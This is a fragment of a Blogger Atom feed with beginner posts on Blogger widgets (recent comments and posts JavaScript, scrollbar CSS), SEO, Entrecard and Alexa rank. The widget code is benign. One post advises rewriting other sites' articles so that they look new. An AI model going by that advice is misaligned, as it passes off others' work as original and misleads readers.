/&gt;&lt;br /&gt;At present I am remembering of these methods only,I'll update this post if I remember any more.&lt;br /&gt;&lt;br /&gt;Also if you would like to add any method or suggest any coorection , plz leave a comment and I'll make suitable changes in post.&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4284377048633026062-7640299493530440391?l=infinitytricks.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://infinitytricks.blogspot.com/feeds/7640299493530440391/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4284377048633026062&amp;postID=7640299493530440391' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/7640299493530440391'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/7640299493530440391'/><link rel='alternate' type='text/html' href='http://infinitytricks.blogspot.com/2009/07/how-to-increase-google-pagerank-of-your.html' title='How to increase Google PageRank of your Blogger Blog ?'/><author><name>Lovana das</name><uri>http://www.blogger.com/profile/03880679332199590678</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4284377048633026062.post-3245317098251601671</id><published>2009-07-26T10:15:00.053-07:00</published><updated>2009-07-26T10:15:53.343-07:00</updated><title type='text'>How to add a Recent Comments Widget to Blogger blog ?</title><content type='html'>It is one of the most commonly used widget alongwith "&lt;a href="http://free-blogger-help.blogspot.com/2008/08/how-to-add-recent-posts-widget-to.html"&gt;&lt;span style="font-weight: bold;"&gt;Recent Posts&lt;/span&gt;&lt;/a&gt;".&lt;br /&gt;&lt;br /&gt;There are two methods by which you can add this 'Recent Comments' widget to your Blogger blog.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Method I -&lt;/span&gt; &lt;span style="font-weight: bold;font-size:130%;" &gt;Adding it as a feed.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Here's step-by-step guide -&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Step I - &lt;/span&gt;Goto &gt; Dashboard &gt; Settings &gt; Site Feed.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Step II - &lt;/span&gt;Now here 'Switch to: Advanced mode', change all settings to full as shown below.&lt;br /&gt;&lt;br /&gt;&lt;img src="http://free.blogger.help.googlepages.com/feed3333.JPG" /&gt;&lt;br /&gt;&lt;br /&gt;Now save the settings.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Step III -&lt;/span&gt; Goto &gt; Layout &gt; Add a Gadget &gt; Feed.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Step IV -&lt;/span&gt; In the 'feed url' enter this -&lt;blockquote&gt;'&lt;span style="color: rgb(0, 102, 0); font-weight: bold;"&gt;http://free-blogger-help.blogspot.com&lt;/span&gt;/feeds/comments/default'&lt;/blockquote&gt;&lt;br /&gt;after changing the value in green to your Blog URL.&lt;br /&gt;&lt;br /&gt;By this method you show maximum of 5 recent comments.&lt;br /&gt;&lt;br /&gt;You can show more comments by following method.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Method II -&lt;span style="font-size:130%;"&gt; Adding it as a javascript.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Step I - &lt;/span&gt;Goto &gt; Dashboard &gt; Layout &gt; Add a Gadget &gt; HTML/Javascript.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Step II -&lt;/span&gt; Copy the following code -&lt;blockquote&gt;&amp;lt;ul&amp;gt;&amp;lt;script style="text/javascript"&amp;gt;&lt;br /&gt;function showrecentcomments(json) {&lt;br /&gt;for (var i = 0; i &amp;lt;&lt;span style="font-weight: bold; color: rgb(255, 0, 0);"&gt;10&lt;/span&gt;; i++) {&lt;br /&gt;var entry = json.feed.entry[i];&lt;br /&gt;var ctlink;&lt;br /&gt;&lt;br /&gt;if (i == json.feed.entry.length) break;&lt;br /&gt;for (var k = 0; k &amp;lt; entry.link.length; k++) {&lt;br /&gt;if (entry.link[k].rel == 'alternate') {&lt;br /&gt;ctlink = entry.link[k].href;&lt;br /&gt;break;&lt;br /&gt;}&lt;br /&gt;}&lt;br /&gt;ctlink = ctlink.replace("#", "#comment-");&lt;br /&gt;var ptlink = ctlink.split("#");&lt;br /&gt;ptlink = ptlink[0];&lt;br /&gt;var txtlink = ptlink.split("/");&lt;br /&gt;txtlink = txtlink[5];&lt;br /&gt;txtlink = txtlink.split(".html");&lt;br /&gt;txtlink = txtlink[0];&lt;br /&gt;var pttitle = txtlink.replace(/-/g," ");&lt;br /&gt;pttitle = pttitle.link(ptlink);&lt;br /&gt;if ("content" in entry) {&lt;br /&gt;var comment = entry.content.$t;}&lt;br /&gt;else&lt;br /&gt;if ("summary" in entry) {&lt;br /&gt;var comment = entry.summary.$t;}&lt;br /&gt;else var comment = "";&lt;br /&gt;var re = /&amp;lt;S[^&amp;gt;]*&amp;gt;/g;&lt;br /&gt;comment = comment.replace(re, "");&lt;br /&gt;&lt;br /&gt;document.write('&amp;lt;li&amp;gt;');&lt;br /&gt;document.write('&amp;lt;a href="' + ctlink + '"&amp;gt;' + entry.author[0].name.$t + '&amp;lt;/a&amp;gt;');&lt;br /&gt;document.write(' on ' + pttitle);&lt;br /&gt;document.write('&amp;lt;br/&amp;gt;');&lt;br /&gt;if (comment.length &amp;lt; &lt;span style="font-weight: bold; color: rgb(51, 51, 255);"&gt;100&lt;/span&gt;) {&lt;br /&gt;document.write(comment);&lt;br /&gt;}&lt;br /&gt;else&lt;br /&gt;{&lt;br /&gt;comment = comment.substring(0, &lt;span style="font-weight: bold; color: rgb(51, 51, 255);"&gt;100&lt;/span&gt;);&lt;br /&gt;var quoteEnd = comment.lastIndexOf(" ");&lt;br /&gt;comment = comment.substring(0, quoteEnd);&lt;br /&gt;document.write(comment + '...&amp;lt;a href="' + ctlink + '"&amp;gt;(more)&amp;lt;/a&amp;gt;');&lt;br /&gt;}&lt;br /&gt;}&lt;br /&gt;document.write('&amp;lt;/li&amp;gt;');&lt;br /&gt;document.write('&amp;lt;div style="font-size:75%;text-align:center"&amp;gt;&amp;lt;a href="http://free-blogger-help.blogspot.com/"&amp;gt;Widgets by Free Blogger Help&amp;lt;/a&amp;gt;&amp;lt;/div&amp;gt;');&lt;br /&gt;}&lt;br /&gt;&amp;lt;/script&amp;gt;&lt;br /&gt;&amp;lt;script src="&lt;span style="font-weight: bold; color: rgb(255, 153, 255);"&gt;http://free-blogger-help.blogspot.com&lt;/span&gt;/feeds/comments/default?alt=json-in-script&amp;amp;callback=showrecentcomments"&amp;gt;&lt;br /&gt;&amp;lt;/script&amp;gt;&amp;lt;/ul&amp;gt;&lt;br /&gt;&amp;lt;noscript&amp;gt;You need to enable JavaScript to read this.&amp;lt;/noscript&amp;gt;&lt;/blockquote&gt;&lt;br /&gt;Now in the above code,I've highlighted three things you can modify -&lt;br /&gt;&lt;br /&gt;1. Most important, &lt;span style="font-weight: bold; color: rgb(255, 153, 255);"&gt;you should enter your blog's url in the pink part.&lt;/span&gt;&lt;br /&gt;2. Secondly , I've made the default number of comments to 10, &lt;span style="font-weight: bold; color: rgb(255, 0, 0);"&gt;you can edit the red part and enter your own value.&lt;/span&gt;&lt;br /&gt;3. Thirdly, it's for the length of comment which limited to 100 characters, &lt;span style="font-weight: bold; color: rgb(51, 51, 255);"&gt;you can any value of your choice in blue part&lt;/span&gt;.&lt;br /&gt;&lt;br /&gt;After you have changed the values, save the widget and check your blog.&lt;br /&gt;&lt;br /&gt;If you have any difficulties, just leave a comment.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4284377048633026062-3245317098251601671?l=infinitytricks.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://infinitytricks.blogspot.com/feeds/3245317098251601671/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4284377048633026062&amp;postID=3245317098251601671' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/3245317098251601671'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/3245317098251601671'/><link rel='alternate' type='text/html' href='http://infinitytricks.blogspot.com/2009/07/how-to-add-recent-comments-widget-to.html' title='How to add a Recent Comments Widget to Blogger blog ?'/><author><name>Lovana das</name><uri>http://www.blogger.com/profile/03880679332199590678</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4284377048633026062.post-1227092882031868344</id><published>2009-07-26T10:15:00.051-07:00</published><updated>2009-07-26T10:15:51.954-07:00</updated><title type='text'>My 50th post - some acheivements........</title><content type='html'>I made first post at this blog on 8th July 2008, and now on 24th August 2008 (after 47 days), I am writing the 50th post for this blog. All these days have really been busy. I appeared for exams, also transferred 1 site to new host (1 is yet to be transferred) , but stiil I managed to post here regularly ( in addition to building links for this blog).&lt;br /&gt;&lt;br /&gt;So lets see, where is my blog after 50 posts (and 47 days).&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;1. Backlinks -&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;First of all lets talk about backlinks.I did some serious link building by submitting to directories and some social bookmarking sites, but my main weapon was 'to comment on do-follow blogs' and also to get listed on blogs with 'Top Commentators' plugin.&lt;br /&gt;&lt;br /&gt;So after 47 days of link-bulding work, my blog has total of 76 links now(as per Google Webmaters Tools). I think thats not bad at all.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;2. Search Engine Ranking - &lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Now lets see where is my blog on search engines (Google only). Here I am taking reference of Google Analytics.&lt;br /&gt;&lt;br /&gt;I got total 257 visits from Google, of which maximum(5) were for the keyword - 'horizontal menu for blogger'. When I searched for this keyword I was really surprised to see my blog placed at 2nd position.&lt;br /&gt;&lt;br /&gt;Second maximum (4) were for keyword - 'passion duo red blogger template' and I was more surprised to see my blog placed at number one position. I know the keyword is not that competitive, but still I was not expecting my blog to be placed so higher for any keyword.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;3. Traffic - &lt;/span&gt;&lt;br /&gt;&lt;br /&gt;After 47 days, this blog is getting on an average of 30-40 visitors and 70-90 pageviews per day.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;4. Earnings - &lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Now lets talk about how much I earned from this blog. As you can see, currently I am using Google Adsense ads only.&lt;br /&gt;&lt;br /&gt;In the month of July I made only $0.02 from this blog on Adsense.I was not expecting this much also, as I am in this Blogging thing since 1 and 1/2 year, and I know how long it takes to earn good from Adsense.&lt;br /&gt;&lt;br /&gt;For August, there's some improvement. Till now, I've made $2.83 from this blog.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;5. RSS readers - &lt;/span&gt;&lt;br /&gt;&lt;br /&gt;As you all can see on my sidebar, there's a feed-count chicklet. It shows 9 readers, which is not bad after 50 posts.&lt;br /&gt;&lt;br /&gt;That's all with this 50th post. Let's see where is this blog at 100th post.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4284377048633026062-1227092882031868344?l=infinitytricks.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://infinitytricks.blogspot.com/feeds/1227092882031868344/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4284377048633026062&amp;postID=1227092882031868344' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/1227092882031868344'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/1227092882031868344'/><link rel='alternate' type='text/html' href='http://infinitytricks.blogspot.com/2009/07/my-50th-post-some-acheivements.html' title='My 50th post - some acheivements........'/><author><name>Lovana das</name><uri>http://www.blogger.com/profile/03880679332199590678</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4284377048633026062.post-1401298240089123550</id><published>2009-07-26T10:15:00.049-07:00</published><updated>2009-07-26T10:15:51.064-07:00</updated><title type='text'>How to add Recent Posts widget to Blogger blog ?</title><content type='html'>A common widget seen on mamy blogs alongwith '&lt;a href="http://free-blogger-help.blogspot.com/2008/08/how-to-add-recent-comments-widget-to.html"&gt;&lt;span style="font-weight: bold;"&gt;Recent Comments&lt;/span&gt;&lt;/a&gt;' widget is 'Recent Posts' widget.&lt;br /&gt;&lt;br /&gt;Again there are two methods by which you can add this 'Recnt Posts' widget to your Blogger blog.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Method I -&lt;/span&gt; &lt;span style="font-weight: bold;font-size:130%;" &gt;Adding it as a feed.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Here's step-by-step guide -&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Step I - &lt;/span&gt;Goto &gt; Dashboard &gt; Settings &gt; Site Feed.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Step II - &lt;/span&gt;Now here 'Switch to: Advanced mode', change all settings to full as shown below.&lt;br /&gt;&lt;br /&gt;&lt;img src="http://free.blogger.help.googlepages.com/feed3333.JPG" /&gt;&lt;br /&gt;&lt;br /&gt;Now save the settings.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Step III -&lt;/span&gt; Goto &gt; Layout &gt; Add a Gadget &gt; Feed.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Step IV -&lt;/span&gt; In the 'feed url' enter this -&lt;blockquote&gt;'&lt;span style="color: rgb(0, 102, 0); font-weight: bold;"&gt;http://free-blogger-help.blogspot.com&lt;/span&gt;/feeds/posts/default'&lt;/blockquote&gt;&lt;br /&gt;after changing the value in green to your Blog URL.&lt;br /&gt;&lt;br /&gt;By this method you show maximum of 5 recent posts .&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4284377048633026062-1401298240089123550?l=infinitytricks.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://infinitytricks.blogspot.com/feeds/1401298240089123550/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4284377048633026062&amp;postID=1401298240089123550' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/1401298240089123550'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/1401298240089123550'/><link rel='alternate' type='text/html' href='http://infinitytricks.blogspot.com/2009/07/how-to-add-recent-posts-widget-to.html' title='How to add Recent Posts widget to Blogger blog ?'/><author><name>Lovana das</name><uri>http://www.blogger.com/profile/03880679332199590678</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4284377048633026062.post-2275657417893979982</id><published>2009-07-26T10:15:00.047-07:00</published><updated>2009-07-26T10:15:50.150-07:00</updated><title type='text'>What is Entrecard ? How does it help ?</title><content type='html'>Entrecard is basically a Blogging network, encouraging bloggers to check out other's blogs.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://entrecard.com/"&gt;&lt;img src="http://free.blogger.help.googlepages.com/entre.JPG" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Here you visit other Entrecard user's Blog and drop your card, which shows the blog owner that you visited his blog. Similarly, if other bloggers visit your blog and drop their card, you get to know that they visited your blog.&lt;br /&gt;&lt;br /&gt;It is really a very useful way to get good early traffic to your new blog. We all know that how frustrating it can be to see low traffic figures for our new blog instead of writing some good content. As you can see, I am also using Entrecard in my sidebar.&lt;br /&gt;&lt;br /&gt;They also have a currency at Entrecard - Entrecard Credits (EC).&lt;br /&gt;&lt;br /&gt;You get 1 EC for each card you drop at other's blog.You also get EC for showing other Entrecard user's adverts using 'Entrecard Widget'. These EC for adverts depends upon how long is the waiting list for advertising on your blog and also on your blog's PR and Alexa Rank.&lt;br /&gt;&lt;br /&gt;Now by collecting these EC's you can buy the advert's on other user's blogs and get some traffic for your blog.&lt;br /&gt;&lt;br /&gt;And if you cant wait for the EC's to accumulate slowly, you can buy more EC's at following rates -&lt;br /&gt;&lt;ul&gt;&lt;li&gt;1000 Entrecard Credits - USD$9.50&lt;/li&gt;&lt;li&gt;5000 Entrecard Credits - USD$47.50&lt;/li&gt;&lt;li&gt;10000 Entrecard Credits - USD$95.00&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;So, in the essence, if your blog is new and you want some good early traffic, you should really give a try to &lt;a href="http://entrecard.com/"&gt;Entrecard&lt;/a&gt;.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4284377048633026062-2275657417893979982?l=infinitytricks.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://infinitytricks.blogspot.com/feeds/2275657417893979982/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4284377048633026062&amp;postID=2275657417893979982' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/2275657417893979982'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/2275657417893979982'/><link rel='alternate' type='text/html' href='http://infinitytricks.blogspot.com/2009/07/what-is-entrecard-how-does-it-help.html' title='What is Entrecard ? How does it help ?'/><author><name>Lovana das</name><uri>http://www.blogger.com/profile/03880679332199590678</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4284377048633026062.post-7120821630565241990</id><published>2009-07-26T10:15:00.045-07:00</published><updated>2009-07-26T10:15:49.292-07:00</updated><title type='text'>How to add scrollbar to Blogger widgets ?</title><content type='html'>Many times we think how great it will be if we can add scrollbar to some widgets. Scrollbar can be  really useful for any lists you want to show on your blog e.g. link-list, labels list etc.&lt;br /&gt;&lt;br /&gt;Adding scrollbar to widgets reduces the total height (and also width if you want) of the widget, but still users can scroll down and view all the content in the widget. When the content in the widget exceeds certain width/height limit, there will be a horizontal/vertical scrollbar enabling users to view all the content.&lt;br /&gt;&lt;br /&gt;Lets see how we can do this -&lt;br /&gt;&lt;span style="font-weight: bold;font-size:130%;" &gt;&lt;br /&gt;A. Add Scrollbar for all widgets (in both sidebars) -&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;STEP I - &lt;/span&gt;Goto &gt; Dashboard &gt; Layout &gt; Edit HTML.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;STEP II - &lt;/span&gt;Add this code in your template - &lt;blockquote&gt;.sidebar .widget{&lt;br /&gt;height:200px;&lt;br /&gt;overflow:auto;&lt;br /&gt;}&lt;/blockquote&gt;You can place this code anywhere above . But I will recommend you to place it below the sidebar section in your template for easy reference.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;font-size:130%;" &gt;B . Add Scrollbar for widgets in one of the sidebars -&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;First of all you will have to find out, what's name of your sidebar where you want to add widget scrollbar e.g. lsidebar, rsidebar, newsidebar etc.(you can find this out by searching for 'sidebar' using 'Ctrl+F')&lt;br /&gt;&lt;br /&gt;Now depending upon the name of your sidebar add this code instead of above -&lt;blockquote&gt;#newsidebar .widget{&lt;br /&gt;height:200px;&lt;br /&gt;overflow:auto;&lt;br /&gt;}&lt;/blockquote&gt;where 'newsidebar' is the name of your sidebar.(you should put your sidebar's name instead of 'newsidebar' in above code.)&lt;br /&gt;&lt;br /&gt;I will recommend you to please PREVIEW your template before saving the changes.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:130%;"&gt;&lt;span style="font-weight: bold;"&gt;C . Add Scrollbar for only one widget -&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Every widget you add in your sidebar is alotted certain specific &lt;span style="font-weight: bold; color: rgb(0, 102, 0);"&gt;ID .&lt;/span&gt; Now you can find out the ID for your widget by looking for similar looking code in your template -&lt;blockquote&gt;&amp;lt;div id='sidebar-wrapper'&amp;gt;&lt;br /&gt;&amp;lt;b:section class='sidebar' id='sidebar' preferred='yes'&amp;gt;&lt;br /&gt;&amp;lt;b:widget id='&lt;span style="color: rgb(0, 102, 0); font-weight: bold;"&gt;LinkList1&lt;/span&gt;' locked='false' title='General' type='LinkList'/&amp;gt;&lt;br /&gt;&amp;lt;b:widget id='&lt;span style="color: rgb(0, 102, 0); font-weight: bold;"&gt;HTML1&lt;/span&gt;' locked='false' title='' type='HTML'/&amp;gt;&lt;br /&gt;&amp;lt;b:widget id='&lt;span style="color: rgb(0, 102, 0); font-weight: bold;"&gt;Label1&lt;/span&gt;' locked='false' title='Label' type='Label'/&amp;gt;&lt;br /&gt;&amp;lt;/b:section&amp;gt;&lt;br /&gt;&amp;lt;/div&amp;gt;&lt;/blockquote&gt;Here you can see I have highlighted the ID for widgets in bold green.&lt;br /&gt;&lt;br /&gt;After finding your widget's ID, add this code -&lt;blockquote&gt;#&lt;span style="color: rgb(0, 102, 0); font-weight: bold;"&gt;Label1&lt;/span&gt;{&lt;br /&gt;height:200px;&lt;br /&gt;overflow:auto;&lt;br /&gt;}&lt;/blockquote&gt;Replacing '&lt;span style="color: rgb(0, 102, 0); font-weight: bold;"&gt;Label1 &lt;/span&gt;' with your widget ID.&lt;br /&gt;&lt;br /&gt;Now save the changes and check your blog.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4284377048633026062-7120821630565241990?l=infinitytricks.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://infinitytricks.blogspot.com/feeds/7120821630565241990/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4284377048633026062&amp;postID=7120821630565241990' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/7120821630565241990'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/7120821630565241990'/><link rel='alternate' type='text/html' href='http://infinitytricks.blogspot.com/2009/07/how-to-add-scrollbar-to-blogger-widgets.html' title='How to add scrollbar to Blogger widgets ?'/><author><name>Lovana das</name><uri>http://www.blogger.com/profile/03880679332199590678</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4284377048633026062.post-8298293029438183351</id><published>2009-07-26T10:15:00.043-07:00</published><updated>2009-07-26T10:15:48.248-07:00</updated><title type='text'>What is Alexa rank ? How accurate is it ?</title><content type='html'>&lt;img src="http://upload.wikimedia.org/wikipedia/en/a/aa/Alexa_logo.png" /&gt;&lt;br /&gt;&lt;br /&gt;It is a subsidiary company of Amazon.com which ranks different websites based on the traffic for that site.&lt;br /&gt;&lt;br /&gt;The Alexa rank is taken as standard on many advertising networks for accepting new publishers e.g. Text Link Ads, Pay Per Post etc.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;How "Accurate" is Alexa rank ?&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;No lets first see how Alexa works and how does it ranks sites.&lt;br /&gt;&lt;br /&gt;Alexa ranks websites based on the visits by internet users using Alexa Toolbar to any site. The important point is Alexa does not take into account the visits by users not using Alexa Toolbar.&lt;br /&gt;&lt;br /&gt;I just compared two of my sites, one site was related to Bollywood and other related to Blogging and Webmaster resources. As per Google Analytics daily visitors for my Bollywood related site was 2000 and that for Blogging and Webmaster resources related site was 1300. But the Alexa rank for my Bollywood site was &gt;100,000 and that for Blogging related site was between 80,000-85,000.&lt;br /&gt;&lt;br /&gt;Now lets see why is it like this - it is less likely that visitors for Bollywood site having Alexa Toolbar installed as compared to visitors for Blogging site who are mostly webmasters and having Alexa Toolbar installed. So although my Bollywood site get more visitors but still have less Alexa rank as compared to Blogging site.&lt;br /&gt;&lt;br /&gt;Thus you can see how 'Accurate' is Alexa rank.&lt;br /&gt;&lt;br /&gt;One more fact about Alexa tooolbar - it is considered as a spyware, adware software by many Antivirus programmes. McAfee detects Alexa toolbar as an adware, 'Potentially Unwanted Programme'.&lt;br /&gt;&lt;br /&gt;Many other security softwares also detect Alexa Toolbar as an adware and spyware.&lt;br /&gt;&lt;br /&gt;But still many sites consider Alexa rank as standard.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4284377048633026062-8298293029438183351?l=infinitytricks.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://infinitytricks.blogspot.com/feeds/8298293029438183351/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4284377048633026062&amp;postID=8298293029438183351' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/8298293029438183351'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/8298293029438183351'/><link rel='alternate' type='text/html' href='http://infinitytricks.blogspot.com/2009/07/what-is-alexa-rank-how-accurate-is-it.html' title='What is Alexa rank ? How accurate is it ?'/><author><name>Lovana das</name><uri>http://www.blogger.com/profile/03880679332199590678</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4284377048633026062.post-4543415201580055657</id><published>2009-07-26T10:15:00.041-07:00</published><updated>2009-07-26T10:15:47.346-07:00</updated><title type='text'>Content is the King - concentrate on it more.</title><content type='html'>These days there have been flood of blogs and sites going online with sole objective to make money online. They do everything to promote their sites and get some traffic. They buy traffic,  SEO plans, SEO friendly templates and so on...........&lt;br /&gt;&lt;br /&gt;But in the process,they forget to improve the content of their site which is most important. The content is the most important thing in any website. But for this content to be useful, it should be unique and not copied as it is from other sites.&lt;br /&gt;&lt;br /&gt;Having quality content not only gets you more visitors through search engines, but also helps you get loyal readers which is very important. Unless and until you have some useful content for a visitor why shall he visit your site again.&lt;br /&gt;&lt;br /&gt;This not only helps you improve your sites traffic rankings, but also helps you get some backlinks for your site. If your content is really good and unique, then others may put your article on their and give you a baclink in return. And again getting backlinks will help you get higher rankings in search engines and thus more traffic.&lt;br /&gt;&lt;br /&gt;Another thing is always write the content related to your site. Like if you have game's blog, you should not write on topic like 'mesothelioma' just because it is high paying keyword. This is most irritating for a visitor. So always write targetted articles.&lt;br /&gt;&lt;br /&gt;To write a good article, you yourself have to read articles mon other sites. You can put similar articles on your site after rewriting them, so that they look new.&lt;br /&gt;&lt;br /&gt;There are also some online softwares like Content Assistant or other tools that can help you generate quality articles on topics you don't know. By using these internet marketing tools, you will be able to save time and effort while concentrating on developing your new products or create your new campaign, etc. Though I can't recommend them, because I myself don't use such services.&lt;br /&gt;&lt;br /&gt;In the end I can only recommend that always do some research before posting any article on your blog and update your blog regularly at least once in a week.&lt;br /&gt;&lt;br /&gt;Just remember -&lt;span style="font-weight: bold;"&gt; "Content is King"&lt;/span&gt;.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4284377048633026062-4543415201580055657?l=infinitytricks.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://infinitytricks.blogspot.com/feeds/4543415201580055657/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4284377048633026062&amp;postID=4543415201580055657' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/4543415201580055657'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/4543415201580055657'/><link rel='alternate' type='text/html' href='http://infinitytricks.blogspot.com/2009/07/content-is-king-concentrate-on-it-more.html' title='Content is the King - concentrate on it more.'/><author><name>Lovana das</name><uri>http://www.blogger.com/profile/03880679332199590678</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' 